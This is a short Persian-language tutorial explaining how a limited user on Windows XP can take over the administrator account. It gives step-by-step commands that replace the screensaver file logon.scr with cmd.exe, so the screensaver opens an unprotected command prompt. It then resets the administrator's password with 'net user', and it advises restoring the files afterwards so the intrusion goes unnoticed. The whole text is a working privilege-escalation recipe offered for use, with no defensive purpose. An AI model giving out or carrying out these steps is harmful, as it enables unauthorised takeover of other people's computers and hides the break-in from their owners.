اگر با كامپيوتري كار مي كند كه روي آن ويندوز xp نصب شده است و دسترسي شما بوسيله كاربر اصلي محدود شده است. آنگاه dos prompt را باز كنيد سپس اين دستورات را وارد نمائيد.

اين دستور شما را به شاخه اصلي مي برد.                                                                               /cd

اين دستور شما را به شاخه system 32 راهنمايي مي كند.                             cd/windows/system 32                                        فولدر temphack را براي شما ايجاد مي كند.                                                     mkdir temphack  

يك فايل Back up (پشتيبان) از فايل logon.scr ايجاد مي كند.          copy logon.scr temphack/ logon.scr

يك فايل پشتيبان از cmd.exe ايجاد مي كند.                                  copy cmd.exe temphack/ cmd.exe

فايل اصلي logon.scr را پاك مي كند.                                  del logon.scr   

فايل cmd.exe رابه logon.scr تغيير نام مي دهد.                                        rename cmd.exe logon.scr

از commond prompt خارج مي شويد.                                                             exit  

كاري كه شما انجام داده ايد از اين قرار است كه يك فايل پشتيبان از برنامه commond و screen saver تهيه كرده سپس كاري كرده ايد كه زمانيكه ويندوز screen saver را فراخواني مي كند يك پنجره حفاظت نشده dos prompt در برابر شما ظاهر مي شود.

به محض ظاهر شدن اين پنجره دستور داخل گيومه را وارد كنيد.

net user<نام Admin را اينجا قرار دهيد>password

مثلاً اگر نام Admin كلمه Ali باشد و شما blah password را مي خواهيد كافيست تايپ كنيد.

”net user Ali blah“

اين عمل رمز عبور را به blah تغيير مي دهد.

نكته: به خاطر داشته باشيد كه محتويات temphack را دوباره به شاخه system 32 برگردانيد تا نفوذ شما لو نرود.